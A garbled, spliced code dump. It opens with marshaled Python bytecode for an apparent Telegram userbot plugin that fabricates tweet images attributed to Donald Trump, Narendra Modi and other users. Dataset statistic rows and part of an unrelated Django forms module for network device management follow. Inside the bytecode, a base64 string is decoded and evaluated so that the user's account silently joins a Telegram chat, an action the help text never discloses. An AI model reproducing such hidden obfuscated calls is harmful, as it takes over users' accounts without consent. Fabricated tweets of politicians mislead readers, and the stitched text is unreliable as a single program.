83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x05\xa1\x01\xa0\x08d\x07\xa1\x01}\x05|\x05\xa0\td\x08d\t\xa1\x02\x01\x00d\x08S\x00)\nN\xfa1https://nekobot.xyz/api/imagegen?type=tweet&text=z\x16&username=narendramodir\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00r\x1f\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\tmoditweetN\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\n\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r+\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00sx\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00d\x02\x9d\x03\xa1\x01\xa0\x02\xa1\x00}\x01|\x01\xa0\x01d\x03\xa1\x01}\x02t\x03|\x02\x83\x01}\x03|\x03s0d\x04S\x00t\x04d\x05d\x06\x83\x02\x8f\x18}\x04|\x04\xa0\x05t\x00\xa0\x01|\x02\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x05\xa1
\x01\xa0\x08d\x07\xa1\x01}\x05|\x05\xa0\td\x08d\t\xa1\x02\x01\x00d\x08S\x00)\nNr*\x00\x00\x00z\x12&username=QoryGorer\x13\x00\x00\x00r\x14\x00\x00\x00\xfa\x07gpx.pngr\x16\x00\x00\x00r\x17\x00\x00\x00\xfa\x08gpx.webpr(\x00\x00\x00r\x1a\x00\x00\x00)\x06r \x00\x00\x00r!\x00\x00\x00Z\x04gengZ\x05kapakr$\x00\x00\x00r%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x08qorygore[\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\n\xff\x08\x03\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r.\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00s|\x00\x00\x00t\x00\xa0\x01d\x01|\x00\x9b\x00d\x02|\x01\x9b\x00\x9d\x04\xa1\x01\xa0\x02\xa1\x00}\x02|\x02\xa0\x01d\x03\xa1\x01}\x03t\x03|\x03\x83\x01}\x04|\x04s4d\x04S\x00t\x04d\x05d\x06\x83\x02\x8f\x18}\x05|\x05\xa0\x05t\x00\xa0\x01|\x03\xa1\x01j\x06\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x07\xa0\x04d\x05\xa1\x01\xa0\x08d\x07\xa1\x01}\x06|\x06\xa0\td\x08d\t\xa1\x02\x01\x00d\x08S\x00)\nNr*\x00\x00\x00z\n&username=r\x13\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00r\x17\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00)\x07Z\x05text1Z\x05text2r!\x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x06tweetsi\x00\x00\x00s\x18\x00\x00\x00\x00\x01\x04\x01\x0e\xff\x08\x02\n\x01\x08\x01\x04\x01\x04\x01\x0c\x01\x1c\x01\x10\x01\x0c\x01r/\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\xc3\x00\x00\x00s2\x00\x00\x00z\x18t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x00\xa0\x01d\x02\xa1\x01\x01\x00W\x00n\x14\x04\x00t\x02k\nr,\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00d\x00S\x00)\x03Nr,\x00\x00\x00r-\x00\x00\x00)\x03\xda\x02os\xda\x06remove\xda\x07OSErrorr\x11\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x05purgev\x00\x00\x00s\n\x00\x00\x00\x00\x01\x02\x01\n\x01\x0e\x01\x0e\x01r3\x00\x00\x00z\x12^.trump(?: |$)(.*)T)\x02\xda\x07pattern\xda\x08outgoingc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x04\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x05\xa1\x01\x83\x01d\x06d\x07\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x08\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\tN\xe9\x01\x00\x00\x00z\'Send you text to trump so he can tweet.z\'send you text to trump so he can tweet.z\x1cRequesting trump to tweet...\xfa@SW1wb3J0Q2hhdEludml0ZVJlcXVlc3QoUGJGZlFCeV9IUEE3NldMZGpfWVBHQSk=\xe9\x02\x00\x00\x00\xe91\x00\x00\x00\xa9\x01Z\x08reply_to)\x12\xda\rpattern_match\xda\x05groupr\x13\x00\x00\x00\xda\x0freply_to_msg_id\xda\x11get_reply_message\xda\x08is_reply\xda\x05media\xda\x04edit\xda\x03str\xda\x08pybase64\xda\tb64decode\xda\x06clientr\x12\x00\x00\x00r&\x00\x00\x00\xda\tsend_file\xda\x07chat_id\xda\x06deleter3\x00\x00\x00\xa9\x05Z\x03catr 
\x00\x00\x00\xda\x0breply_to_idZ\x03sanZ\x07catfiler\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x07nekobot~\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01rK\x00\x00\x00z\x10^\\.qg(?: |$)(.*))\x02r5\x00\x00\x00r4\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00s\xbe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01t\x02\xa0\x03d\x02d\x03|\x01\xa1\x03}\x01|\x00j\x04}\x02|\x00j\x05r4|\x00\xa0\x06\xa1\x00I\x00d\x00H\x00}\x02|\x01s`|\x00j\x07rL|\x02j\x08sL|\x02j\x04}\x01n\x14|\x00\xa0\td\x04\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\td\x05\xa1\x01I\x00d\x00H\x00\x01\x00t\n|\x01\x83\x01}\x01t\x0b|\x01\x83\x01I\x00d\x00H\x00}\x03|\x00j\x0cj\r|\x00j\x0e|\x03|\x02d\x06\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x0f\xa1\x00I\x00d\x00H\x00\x01\x00t\x10\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\x07Nr6\x00\x00\x00\xfa\x01&r\x0e\x00\x00\x00z-`Send you text to @QoryGore so he can tweet.`z!`Requesting QoryGore to tweet...`r:\x00\x00\x00)\x11r;\x00\x00\x00r<\x00\x00\x00r\x0f\x00\x00\x00r\x06\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00r\x12\x00\x00\x00r.\x00\x00\x00rE\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00)\x04\xda\x05eventr \x00\x00\x00rJ\x00\x00\x00r%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x02qg\x9a\x00\x00\x00s \x00\x00\x00\x00\x02\x0c\x01\x0e\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x0c\x01\x08\x02\x10\x01\x04\x01\x10\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01rN\x00\x00\x00z\x11^.modi(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x04\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x05\xa1\x01\x83\x01d\x06d\x07\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x08\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\tNr6\x00\x00\x00z&Send you text to modi so he can tweet.z&send you text to modi so he can tweet.z\x1bRequesting modi to tweet...r7\x00\x00\x00r8\x00\x00\x00r9\x00\x00\x00r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rE\x00\x00\x00r\x12\x00\x00\x00r+\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00rI\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00rK\x00\x00\x00\xae\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01z\x10^.cmm(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x04\xa1\x01\x83\x01d\x05d\x06\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x07\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\x08Nr6\x00\x00\x00z%Give text for to write on banner, manz+Your banner is under creation wait a sec...r7\x00\x00\x00r8\x00\x00\x00r9\x00\x00\x00r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rE\x00\x00\x00r\x12\x00\x00\x00r\'\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00rI\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00rK\x00\x00\x00\xca\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01z\x12^.kanna(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x04\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x05\xa1\x01\x83\x01d\x06d\x07\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x08\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\tNr6\x00\x00\x00z"what should kanna write give text z!what should kanna write give textz\x1dKanna is writing your text...r7\x00\x00\x00r8\x00\x00\x00r9\x00\x00\x00r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rE\x00\x00\x00r\x12\x00\x00\x00r)\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00rI\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00rK\x00\x00\x00\xe6\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01z\x12\\.tweet(?: 
|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00s\x06\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01t\x02\xa0\x03d\x02d\x03|\x01\xa1\x03}\x01|\x00j\x04}\x02|\x00j\x05r4|\x00\xa0\x06\xa1\x00I\x00d\x00H\x00}\x02|\x01sv|\x00j\x07rb|\x02j\x08sL|\x02j\x04}\x01qv|\x00\xa0\td\x04\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\td\x05\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00d\x06|\x01k\x06r\x8e|\x01\xa0\nd\x06\xa1\x01\\\x02}\x03}\x01n\x10|\x00\xa0\td\x04\xa1\x01I\x00d\x00H\x00\x01\x00|\x00\xa0\td\x07|\x03\x9b\x00d\x08\x9d\x03\xa1\x01I\x00d\x00H\x00\x01\x00t\x0b|\x01\x83\x01}\x01t\x0c|\x01|\x03\x83\x02I\x00d\x00H\x00}\x04|\x00j\rj\x0e|\x00j\x0f|\x04|\x02d\t\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\nNr6\x00\x00\x00rL\x00\x00\x00r\x0e\x00\x00\x00z4`What should i tweet? Give your username and tweet!`z3What should i tweet? Give your username and tweet!`\xda\x01.z\x0c`Requesting z\r to tweet...`r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x0f\x00\x00\x00r\x06\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x05splitr\x12\x00\x00\x00r/\x00\x00\x00rE\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00)\x05rM\x00\x00\x00r \x00\x00\x00rJ\x00\x00\x00Z\x08usernamer%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x05tweet\x02\x01\x00\x00s,\x00\x00\x00\x00\x02\x0c\x01\x0e\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x08\x01\x10\x02\x10\x01\x18\x01\x08\x01\x10\x01\x1a\x01\x0e\x01rQ\x00\x00\x00a[\x01\x00\x00>`.tweet` <username>.<tweet>\nUsage: Create tweet with custom username.\n\n>`.trump` <tweet>\nUsage: Create tweet for Donald Trump.\n\n>`.modi` <tweet>\nUsage: Create tweet for Narendra Modi.\n\n>`.qg` <tweet>\nUsage: Create tweet for `@QoryGore`.\n\n>`.cmm` <text>\nUsage: Create banner for Change My Mind.\n\n>`.kanna` <text>\nUsage: Kanna is writing your text.)&Z\x06randomr\x02\x00\x00\x00Z\x07asyncior\x03\x00\x00\x00Z\x08telethonr\x04\x00\x00\x00Z\x0euserbot.eventsr\x05\x00\x00\x00\xda\x04timer\x1b\x00\x00\x00r0\x00\x00\x00r\x0f\x00\x00\x00r\x06\x00\x00\x00Z\x03bs4r\x07\x00\x00\x00Z\x05emojir\x08\x00\x00\x00Z\x03PILr\t\x00\x00\x00Z\x0evalidators.urlr\n\x00\x00\x00Z\x07userbotr\x0b\x00\x00\x00\xda\x07compiler\x10\x00\x00\x00rB\x00\x00\x00r\x12\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00r)\x00\x00\x00r+\x00\x00\x00r.\x00\x00\x00r/\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00rN\x00\x00\x00rQ\x00\x00\x00\xda\x06updater\x11\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x08<module>\x02\x00\x00\x00sR\x00\x00\x00\x08\x01\x0c\x02\x08\x01\x0c\x01\x0c\x01\x0c\x01\x08\x01\x18\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x03\x04\x01\x02\xff\x04\x10\x10\x04\x08\r\x08\r\x08\r\x08\r\x08\x0e\x08\r\x08\x08\n\x01\n\x1b\n\x01\n\x13\n\x01\n\x1b\n\x01\n\x1b\n\x01\n\x1b\n\x01\n\x1c\x04\x02\x02\x00\x02\xff\x02\xff'))
| 4,819.75
| 19,208
| 0.752269
| 4,221
| 19,279
| 3.432125
| 0.104004
| 0.264237
| 0.155933
| 0.120936
| 0.729965
| 0.696625
| 0.68558
| 0.667288
| 0.658245
| 0.650652
| 0
| 0.36572
| 0.00861
| 19,279
| 4
| 19,208
| 4,819.75
| 0.392246
| 0.002697
| 0
| 0
| 0
| 1.5
| 0.614949
| 0.345158
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
0d2d9b28d23caf4f0152fa59ac66ce02dcb8f16d
| 31,554
|
py
|
Python
|
devnet2019/forms.py
|
snowtrain/network-ops
|
fc439c0531258be545f31964e195cadde479734e
|
[
"MIT"
] | 1
|
2020-04-03T07:34:47.000Z
|
2020-04-03T07:34:47.000Z
|
devnet2019/forms.py
|
snowtrain/network-ops
|
fc439c0531258be545f31964e195cadde479734e
|
[
"MIT"
] | null | null | null |
devnet2019/forms.py
|
snowtrain/network-ops
|
fc439c0531258be545f31964e195cadde479734e
|
[
"MIT"
] | null | null | null |
from django import forms
from django.core.validators import RegexValidator
from devnet2019.models import Devicetype, Devicedb, FieldTypeMap, ApplicationMap
# Add device type
class AddDeviceType(forms.Form):
# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
# Device type name
device_type_name = forms.CharField(label='设备类型名称',
widget=forms.TextInput(attrs={"class": "form-control"}))
# CPU utilization
cpu_usage = forms.CharField(label='CPU利用率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Memory used
mem_usage = forms.CharField(label='内存使用 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Memory free
mem_free = forms.CharField(label='内存闲置 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface name
if_name = forms.CharField(label='接口名称 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface speed
if_speed = forms.CharField(label='接口速率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface state
if_state = forms.CharField(label='接口状态 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface inbound bytes
if_in_bytes = forms.CharField(label='接口入向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface outbound bytes
if_out_bytes = forms.CharField(label='接口出向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_device_type_name(self):
device_type_name = self.cleaned_data['device_type_name']
try:
Devicetype.objects.get(type_name=device_type_name)
raise forms.ValidationError("设备类型已存在!")
except Devicetype.DoesNotExist:
return device_type_name
# Edit device type
class EditDeviceType(forms.Form):
# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
device_id = forms.IntegerField(label='设备类型ID',
required=True,
widget=forms.TextInput(attrs={"class": "form-control", 'readonly': True}))
# Device type name
device_type_name = forms.CharField(label='设备类型名称',
widget=forms.TextInput(attrs={"class": "form-control"}))
# CPU utilization
cpu_usage = forms.CharField(label='CPU一分钟利用率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Memory used
mem_usage = forms.CharField(label='内存使用 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Memory free
mem_free = forms.CharField(label='内存闲置 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface name
if_name = forms.CharField(label='接口名称 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface speed
if_speed = forms.CharField(label='接口速率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface state
if_state = forms.CharField(label='接口状态 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface inbound bytes
if_in_bytes = forms.CharField(label='接口入向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# Interface outbound bytes
if_out_bytes = forms.CharField(label='接口出向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_device_type_name(self):
device_type_name = self.cleaned_data['device_type_name']
device_id = self.cleaned_data['device_id']
try:
if device_id != Devicetype.objects.get(type_name=device_type_name).id:
raise forms.ValidationError("设备类型已存在!")
else:
return device_type_name
except Devicetype.DoesNotExist:
return device_type_name
# Add device form
class AddDevice(forms.Form):
# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
name = forms.CharField(max_length=100,
min_length=2,
label='设备名称',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
# GenericIPAddressField validates the entered IP address
ip = forms.GenericIPAddressField(required=True,
label='IP地址',
widget=forms.TextInput(attrs={"class": "form-control"}))
description = forms.CharField(label="设备描述",
required=False,
# Textarea allows multi-line input; "rows": 3 controls how many rows are displayed
widget=forms.Textarea(attrs={"class": "form-control", "rows": 3}))
# Selectable device types
type_choices = []
devicetype = Devicetype.objects.all()
for x in devicetype:
type_choices.append([x.id, x.type_name])
type = forms.CharField(label='设备类型',
required=True,
widget=forms.Select(choices=type_choices,
attrs={"class": "form-control"}))
TRUE_FALSE_CHOICES = ((True, 'Yes'), (False, 'No'))
snmp_enable = forms.ChoiceField(label='是否激活SNMP',
required=True,
choices=TRUE_FALSE_CHOICES,
initial=False,
widget=forms.Select(attrs={"class": "required checkbox form-control"}))
community_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="SNMP community 只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
snmp_ro_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP只读',
required=True,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
snmp_rw_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP读写',
required=False,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
username_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="用户名只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_username = forms.CharField(max_length=100,
min_length=2,
label='SSH用户名',
required=True,
validators=[username_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_password = forms.CharField(max_length=100,
min_length=2,
label='SSH密码',
required=True,
validators=[password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
enable_password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="特权密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
enable_password = forms.CharField(max_length=100,
min_length=2,
label='特权密码',
required=False,
validators=[enable_password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
# Validate that the device name is not duplicated; in this system devices have no separate unique ID, the device name is the unique ID and must not repeat
def clean_name(self):
name = self.cleaned_data['name'] # get the device name entered by the user
# Check whether this device name already exists in the database; exists() returns True if the queryset has data, otherwise False
existing = Devicedb.objects.filter(name=name).exists()
# If it exists, show a validation error
if existing:
raise forms.ValidationError("设备名不能重复")
# If validation passes, return the device name
return name
# Validate that the IP address is not duplicated
def clean_ip(self):
ip = self.cleaned_data['ip'] # get the device IP entered by the user
# Check whether this device IP already exists in the database
existing = Devicedb.objects.filter(
ip=ip
).exists()
# If it exists, show a validation error
if existing:
raise forms.ValidationError("设备IP不能重复")
# If validation passes, return the device IP
return ip
# SNMP must be enabled before the read-only community can be set
def clean_snmp_ro_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_ro_community = self.cleaned_data['snmp_ro_community']
if snmp_enable == 'True' and snmp_ro_community:
return snmp_ro_community
else:
raise forms.ValidationError("设置只读Community之前请激活SNMP")
# SNMP must be enabled before the read-write community can be set
def clean_snmp_rw_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_rw_community = self.cleaned_data['snmp_rw_community']
if snmp_rw_community:
if snmp_enable == 'True' and snmp_rw_community:
return snmp_rw_community
else:
raise forms.ValidationError("设置读写Community之前请激活SNMP")
else:
return snmp_rw_community
# Edit device form
class EditDevice(forms.Form):
